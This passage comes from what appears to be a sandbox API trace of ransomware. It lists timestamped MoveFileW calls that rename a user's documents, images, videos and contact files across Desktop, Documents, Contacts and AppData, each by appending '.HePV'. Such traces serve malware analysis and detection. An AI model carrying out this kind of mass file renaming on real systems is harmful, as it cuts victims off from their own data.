(lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\RBf 3Yx-sqURA.xlsx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\rbf 3yx-squra.xlsx"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\RBf 3Yx-sqURA.xlsx.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\rbf 3yx-squra.xlsx.hepv")) returned 1 [0050.971] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\sv0EwoB.pptx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\sv0ewob.pptx"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\sv0EwoB.pptx.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\sv0ewob.pptx.hepv")) returned 1 [0050.977] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\W wnadctvOXoBFfL_.swf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\w wnadctvoxobffl_.swf"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\W wnadctvOXoBFfL_.swf.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\w wnadctvoxobffl_.swf.hepv")) returned 1 [0050.981] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\xzoftPay6Ttsn9BSphM.pptx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\xzoftpay6ttsn9bsphm.pptx"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\xzoftPay6Ttsn9BSphM.pptx.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\xzoftpay6ttsn9bsphm.pptx.hepv")) returned 1 [0050.988] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\Y676JuyccEWcz.jpg" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\y676juyccewcz.jpg"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\Y676JuyccEWcz.jpg.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\y676juyccewcz.jpg.hepv")) returned 1 [0050.996] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\contacts\\Administrator.contact" (normalized: "c:\\users\\eebsym5\\contacts\\administrator.contact"), lpNewFileName="c:\\users\\eebsym5\\contacts\\Administrator.contact.HePV" (normalized: "c:\\users\\eebsym5\\contacts\\administrator.contact.hepv")) returned 1 [0050.998] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\contacts\\desktop.ini" (normalized: "c:\\users\\eebsym5\\contacts\\desktop.ini"), lpNewFileName="c:\\users\\eebsym5\\contacts\\desktop.ini.HePV" (normalized: "c:\\users\\eebsym5\\contacts\\desktop.ini.hepv")) returned 1 [0051.055] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact"), lpNewFileName="c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact.HePV" (normalized: "c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact.hepv")) returned 1 [0051.058] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\contacts\\lodkd auftnm.contact" (normalized: "c:\\users\\eebsym5\\contacts\\lodkd auftnm.contact"), lpNewFileName="c:\\users\\eebsym5\\contacts\\lodkd auftnm.contact.HePV" (normalized: "c:\\users\\eebsym5\\contacts\\lodkd auftnm.contact.hepv")) returned 1 [0051.061] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\contacts\\mneuc uhnfghgg.contact" (normalized: "c:\\users\\eebsym5\\contacts\\mneuc uhnfghgg.contact"), lpNewFileName="c:\\users\\eebsym5\\contacts\\mneuc uhnfghgg.contact.HePV" (normalized: "c:\\users\\eebsym5\\contacts\\mneuc uhnfghgg.contact.hepv")) returned 1 [0051.078] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\contacts\\ofhbnh edferrr.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ofhbnh edferrr.contact"), lpNewFileName="c:\\users\\eebsym5\\contacts\\ofhbnh edferrr.contact.HePV" (normalized: "c:\\users\\eebsym5\\contacts\\ofhbnh edferrr.contact.hepv")) returned 1 [0051.082] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\contacts\\uosjfl sidvllie.contact" (normalized: "c:\\users\\eebsym5\\contacts\\uosjfl sidvllie.contact"), lpNewFileName="c:\\users\\eebsym5\\contacts\\uosjfl sidvllie.contact.HePV" (normalized: "c:\\users\\eebsym5\\contacts\\uosjfl sidvllie.contact.hepv")) returned 1 [0051.094] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\1_IGBala.ods" (normalized: "c:\\users\\eebsym5\\desktop\\1_igbala.ods"), lpNewFileName="c:\\users\\eebsym5\\desktop\\1_IGBala.ods.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\1_igbala.ods.hepv")) returned 1 [0051.147] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\79PDyHsbK5pU9UV4xhi0.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\79pdyhsbk5pu9uv4xhi0.bmp"), lpNewFileName="c:\\users\\eebsym5\\desktop\\79PDyHsbK5pU9UV4xhi0.bmp.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\79pdyhsbk5pu9uv4xhi0.bmp.hepv")) returned 1 [0051.169] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\csqL6Um Aq.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\csql6um aq.rtf"), lpNewFileName="c:\\users\\eebsym5\\desktop\\csqL6Um Aq.rtf.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\csql6um aq.rtf.hepv")) returned 1 [0051.172] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\desktop.ini"), lpNewFileName="c:\\users\\eebsym5\\desktop\\desktop.ini.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\desktop.ini.hepv")) returned 1 [0051.176] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\gWNn7Wqv.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\gwnn7wqv.bmp"), lpNewFileName="c:\\users\\eebsym5\\desktop\\gWNn7Wqv.bmp.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\gwnn7wqv.bmp.hepv")) returned 1 [0051.200] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\iwXRkOL7ZjgXr_eoQRE.png" (normalized: "c:\\users\\eebsym5\\desktop\\iwxrkol7zjgxr_eoqre.png"), lpNewFileName="c:\\users\\eebsym5\\desktop\\iwXRkOL7ZjgXr_eoQRE.png.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\iwxrkol7zjgxr_eoqre.png.hepv")) returned 1 [0051.212] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\8qH15DFNlBDTSg_.png" (normalized: "c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\8qh15dfnlbdtsg_.png"), lpNewFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\8qH15DFNlBDTSg_.png.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\8qh15dfnlbdtsg_.png.hepv")) returned 1 [0051.225] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\g iljwwrdtah\\PkP4NBraSg.odt" (normalized: "c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\g iljwwrdtah\\pkp4nbrasg.odt"), lpNewFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\g iljwwrdtah\\PkP4NBraSg.odt.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\g iljwwrdtah\\pkp4nbrasg.odt.hepv")) returned 1 [0051.227] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\g iljwwrdtah\\q4cBzyNkRYoNu_.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\g iljwwrdtah\\q4cbzynkryonu_.jpg"), lpNewFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\g iljwwrdtah\\q4cBzyNkRYoNu_.jpg.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\g iljwwrdtah\\q4cbzynkryonu_.jpg.hepv")) returned 1 [0051.245] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\gpOz- 8CcvKgzn0jszT7.doc" (normalized: "c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\gpoz- 8ccvkgzn0jszt7.doc"), lpNewFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\gpOz- 8CcvKgzn0jszT7.doc.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\gpoz- 8ccvkgzn0jszt7.doc.hepv")) returned 1 [0051.250] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\lxezbufboifqk\\aW0oa8wF.ots" (normalized: "c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\lxezbufboifqk\\aw0oa8wf.ots"), lpNewFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\lxezbufboifqk\\aW0oa8wF.ots.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\lxezbufboifqk\\aw0oa8wf.ots.hepv")) returned 1 [0051.254] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\lxezbufboifqk\\bURTK7dBgvQSJllk-tg5.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\lxezbufboifqk\\burtk7dbgvqsjllk-tg5.mp4"), lpNewFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\lxezbufboifqk\\bURTK7dBgvQSJllk-tg5.mp4.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\lxezbufboifqk\\burtk7dbgvqsjllk-tg5.mp4.hepv")) returned 1 [0051.259] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\lxezbufboifqk\\L-r-wqjSB91lAG1o4E.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\lxezbufboifqk\\l-r-wqjsb91lag1o4e.bmp"), lpNewFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\lxezbufboifqk\\L-r-wqjSB91lAG1o4E.bmp.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\lxezbufboifqk\\l-r-wqjsb91lag1o4e.bmp.hepv")) returned 1 [0051.269] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\p37ags-5mswvb27\\3xou5qDQw.ppt" (normalized: "c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\p37ags-5mswvb27\\3xou5qdqw.ppt"), lpNewFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\p37ags-5mswvb27\\3xou5qDQw.ppt.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\p37ags-5mswvb27\\3xou5qdqw.ppt.hepv")) returned 1 [0051.275] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\p37ags-5mswvb27\\ivrW-PZZbHUd.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\p37ags-5mswvb27\\ivrw-pzzbhud.jpg"), lpNewFileName="c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\p37ags-5mswvb27\\ivrW-PZZbHUd.jpg.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\k-lhl-zz 5ixle\\p37ags-5mswvb27\\ivrw-pzzbhud.jpg.hepv")) returned 1 [0051.285] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\N4TX.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\n4tx.jpg"), lpNewFileName="c:\\users\\eebsym5\\desktop\\N4TX.jpg.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\n4tx.jpg.hepv")) returned 1 [0051.289] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\nMrCnz0SUWJ0Bz.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\nmrcnz0suwj0bz.mp4"), lpNewFileName="c:\\users\\eebsym5\\desktop\\nMrCnz0SUWJ0Bz.mp4.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\nmrcnz0suwj0bz.mp4.hepv")) returned 1 [0051.297] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\oQYQATJa.odt" (normalized: "c:\\users\\eebsym5\\desktop\\oqyqatja.odt"), lpNewFileName="c:\\users\\eebsym5\\desktop\\oQYQATJa.odt.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\oqyqatja.odt.hepv")) returned 1 [0051.304] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\p1rhDW8l6-FSZWcU.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\p1rhdw8l6-fszwcu.mp4"), lpNewFileName="c:\\users\\eebsym5\\desktop\\p1rhDW8l6-FSZWcU.mp4.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\p1rhdw8l6-fszwcu.mp4.hepv")) returned 1 [0051.307] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\rcYv8PKRE E.png" (normalized: "c:\\users\\eebsym5\\desktop\\rcyv8pkre e.png"), lpNewFileName="c:\\users\\eebsym5\\desktop\\rcYv8PKRE E.png.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\rcyv8pkre e.png.hepv")) returned 1 [0051.313] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\S77MMXu8iTR1r.png" (normalized: "c:\\users\\eebsym5\\desktop\\s77mmxu8itr1r.png"), lpNewFileName="c:\\users\\eebsym5\\desktop\\S77MMXu8iTR1r.png.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\s77mmxu8itr1r.png.hepv")) returned 1 [0051.317] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\sQsKCsZm3aZhrF94 TE.png" (normalized: "c:\\users\\eebsym5\\desktop\\sqskcszm3azhrf94 te.png"), lpNewFileName="c:\\users\\eebsym5\\desktop\\sQsKCsZm3aZhrF94 TE.png.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\sqskcszm3azhrf94 te.png.hepv")) returned 1 [0051.324] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\Tbdp.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\tbdp.jpg"), lpNewFileName="c:\\users\\eebsym5\\desktop\\Tbdp.jpg.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\tbdp.jpg.hepv")) returned 1 [0051.333] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\TkOqe.png" (normalized: "c:\\users\\eebsym5\\desktop\\tkoqe.png"), lpNewFileName="c:\\users\\eebsym5\\desktop\\TkOqe.png.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\tkoqe.png.hepv")) returned 1 [0051.336] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\ui8RNJ.xls" (normalized: "c:\\users\\eebsym5\\desktop\\ui8rnj.xls"), lpNewFileName="c:\\users\\eebsym5\\desktop\\ui8RNJ.xls.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\ui8rnj.xls.hepv")) returned 1 [0051.342] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\uX0PKAywEq.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\ux0pkayweq.bmp"), lpNewFileName="c:\\users\\eebsym5\\desktop\\uX0PKAywEq.bmp.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\ux0pkayweq.bmp.hepv")) returned 1 [0051.350] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\V0d4yp.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\v0d4yp.bmp"), lpNewFileName="c:\\users\\eebsym5\\desktop\\V0d4yp.bmp.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\v0d4yp.bmp.hepv")) returned 1 [0051.357] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\X4F1oxr8DWGqb-B.png" (normalized: "c:\\users\\eebsym5\\desktop\\x4f1oxr8dwgqb-b.png"), lpNewFileName="c:\\users\\eebsym5\\desktop\\X4F1oxr8DWGqb-B.png.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\x4f1oxr8dwgqb-b.png.hepv")) returned 1 [0051.367] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\Y1W-Fjl5.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\y1w-fjl5.bmp"), lpNewFileName="c:\\users\\eebsym5\\desktop\\Y1W-Fjl5.bmp.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\y1w-fjl5.bmp.hepv")) returned 1 [0051.371] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\desktop\\_lSWEqP5JJ6o4rznQ.mp4" (normalized: "c:\\users\\eebsym5\\desktop\\_lsweqp5jj6o4rznq.mp4"), lpNewFileName="c:\\users\\eebsym5\\desktop\\_lSWEqP5JJ6o4rznQ.mp4.HePV" (normalized: "c:\\users\\eebsym5\\desktop\\_lsweqp5jj6o4rznq.mp4.hepv")) returned 1 [0051.376] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\4d0M7yinm.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\4d0m7yinm.xlsx"), lpNewFileName="c:\\users\\eebsym5\\documents\\4d0M7yinm.xlsx.HePV" (normalized: "c:\\users\\eebsym5\\documents\\4d0m7yinm.xlsx.hepv")) returned 1 [0051.379] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\5gjks84.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\5gjks84.xlsx"), lpNewFileName="c:\\users\\eebsym5\\documents\\5gjks84.xlsx.HePV" (normalized: "c:\\users\\eebsym5\\documents\\5gjks84.xlsx.hepv")) returned 1 [0051.382] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\7EZhzfHiIt6gjr8.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\7ezhzfhiit6gjr8.xlsx"), lpNewFileName="c:\\users\\eebsym5\\documents\\7EZhzfHiIt6gjr8.xlsx.HePV" (normalized: "c:\\users\\eebsym5\\documents\\7ezhzfhiit6gjr8.xlsx.hepv")) returned 1 [0051.402] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\3EehdTzU.ppt" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\3eehdtzu.ppt"), lpNewFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\3EehdTzU.ppt.HePV" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\3eehdtzu.ppt.hepv")) returned 1 [0051.417] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\8GlaIxcO6o.ppt" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\8glaixco6o.ppt"), lpNewFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\8GlaIxcO6o.ppt.HePV" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\8glaixco6o.ppt.hepv")) returned 1 [0051.424] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\EOSf-TNnQP_Bkkp44.xls" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\eosf-tnnqp_bkkp44.xls"), lpNewFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\EOSf-TNnQP_Bkkp44.xls.HePV" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\eosf-tnnqp_bkkp44.xls.hepv")) returned 1 [0051.437] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gp6ew8b8-\\4eQ6cGOG NQcOFXw.odt" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gp6ew8b8-\\4eq6cgog nqcofxw.odt"), lpNewFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gp6ew8b8-\\4eQ6cGOG NQcOFXw.odt.HePV" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gp6ew8b8-\\4eq6cgog nqcofxw.odt.hepv")) returned 1 [0051.441] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gp6ew8b8-\\5HhEJEgP dGj.odt" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gp6ew8b8-\\5hhejegp dgj.odt"), lpNewFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gp6ew8b8-\\5HhEJEgP dGj.odt.HePV" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gp6ew8b8-\\5hhejegp dgj.odt.hepv")) returned 1 [0051.447] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gp6ew8b8-\\nPOu-PDRM w.odp" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gp6ew8b8-\\npou-pdrm w.odp"), lpNewFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gp6ew8b8-\\nPOu-PDRM w.odp.HePV" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gp6ew8b8-\\npou-pdrm w.odp.hepv")) returned 1 [0051.452] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gp6ew8b8-\\tWFHPdGe eG__.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gp6ew8b8-\\twfhpdge eg__.xlsx"), lpNewFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gp6ew8b8-\\tWFHPdGe eG__.xlsx.HePV" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gp6ew8b8-\\twfhpdge eg__.xlsx.hepv")) returned 1 [0051.462] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gUa9.rtf" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gua9.rtf"), lpNewFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gUa9.rtf.HePV" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\gua9.rtf.hepv")) returned 1 [0051.469] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\j7a6aj99x6358L.pps" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\j7a6aj99x6358l.pps"), lpNewFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\j7a6aj99x6358L.pps.HePV" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\j7a6aj99x6358l.pps.hepv")) returned 1 [0051.488] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\JbQb3 PH.rtf" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\jbqb3 ph.rtf"), lpNewFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\JbQb3 PH.rtf.HePV" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\jbqb3 ph.rtf.hepv")) returned 1 [0051.518] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\jZPxua.pps" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\jzpxua.pps"), lpNewFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\jZPxua.pps.HePV" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\jzpxua.pps.hepv")) returned 1 [0051.551] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\kh0OV-dsConnc2PvE8S.rtf" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\kh0ov-dsconnc2pve8s.rtf"), lpNewFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\kh0OV-dsConnc2PvE8S.rtf.HePV" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\kh0ov-dsconnc2pve8s.rtf.hepv")) returned 1 [0051.575] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\N45nd3sPnu29FhVt.rtf" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\n45nd3spnu29fhvt.rtf"), lpNewFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\N45nd3sPnu29FhVt.rtf.HePV" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\n45nd3spnu29fhvt.rtf.hepv")) returned 1 [0051.596] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\tPzuMEejjF.pdf" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\tpzumeejjf.pdf"), lpNewFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\tPzuMEejjF.pdf.HePV" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\tpzumeejjf.pdf.hepv")) returned 1 [0051.619] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\_V40ECOtDketLHYst.odt" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\_v40ecotdketlhyst.odt"), lpNewFileName="c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\_V40ECOtDketLHYst.odt.HePV" (normalized: "c:\\users\\eebsym5\\documents\\7l9nuz9qsmy\\_v40ecotdketlhyst.odt.hepv")) returned 1 [0051.637] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\7oxt4.csv" (normalized: "c:\\users\\eebsym5\\documents\\7oxt4.csv"), lpNewFileName="c:\\users\\eebsym5\\documents\\7oxt4.csv.HePV" (normalized: "c:\\users\\eebsym5\\documents\\7oxt4.csv.hepv")) returned 1 [0051.642] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\83XR9j9M5.docx" (normalized: "c:\\users\\eebsym5\\documents\\83xr9j9m5.docx"), lpNewFileName="c:\\users\\eebsym5\\documents\\83XR9j9M5.docx.HePV" (normalized: "c:\\users\\eebsym5\\documents\\83xr9j9m5.docx.hepv")) returned 1 [0051.653] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\AsSaLSf QVmb1.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\assalsf qvmb1.xlsx"), lpNewFileName="c:\\users\\eebsym5\\documents\\AsSaLSf QVmb1.xlsx.HePV" (normalized: "c:\\users\\eebsym5\\documents\\assalsf qvmb1.xlsx.hepv")) returned 1 [0051.665] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\B2azdPvI8g.odt" (normalized: "c:\\users\\eebsym5\\documents\\b2azdpvi8g.odt"), lpNewFileName="c:\\users\\eebsym5\\documents\\B2azdPvI8g.odt.HePV" (normalized: "c:\\users\\eebsym5\\documents\\b2azdpvi8g.odt.hepv")) returned 1 [0051.711] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\cI RCT.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ci rct.pptx"), lpNewFileName="c:\\users\\eebsym5\\documents\\cI RCT.pptx.HePV" (normalized: "c:\\users\\eebsym5\\documents\\ci rct.pptx.hepv")) returned 1 [0051.726] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\desktop.ini" (normalized: "c:\\users\\eebsym5\\documents\\desktop.ini"), lpNewFileName="c:\\users\\eebsym5\\documents\\desktop.ini.HePV" (normalized: "c:\\users\\eebsym5\\documents\\desktop.ini.hepv")) returned 1 [0051.744] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\dlYgqmn_Mo2E0db.csv" (normalized: "c:\\users\\eebsym5\\documents\\dlygqmn_mo2e0db.csv"), lpNewFileName="c:\\users\\eebsym5\\documents\\dlYgqmn_Mo2E0db.csv.HePV" (normalized: "c:\\users\\eebsym5\\documents\\dlygqmn_mo2e0db.csv.hepv")) returned 1 [0051.757] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\exjzdxjf x\\CCxN.odp" (normalized: "c:\\users\\eebsym5\\documents\\exjzdxjf x\\ccxn.odp"), lpNewFileName="c:\\users\\eebsym5\\documents\\exjzdxjf x\\CCxN.odp.HePV" (normalized: "c:\\users\\eebsym5\\documents\\exjzdxjf x\\ccxn.odp.hepv")) returned 1 [0051.770] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\documents\\exjzdxjf x\\dgQb2X.ots" (normalized: "c:\\users\\eebsym5\\documents\\exjzdxjf x\\dgqb2x.ots"), lpNewFileName="c:\\users\\eebsym5\\documents\\exjzdxjf x\\dgQb2X.ots.HePV" (normalized: 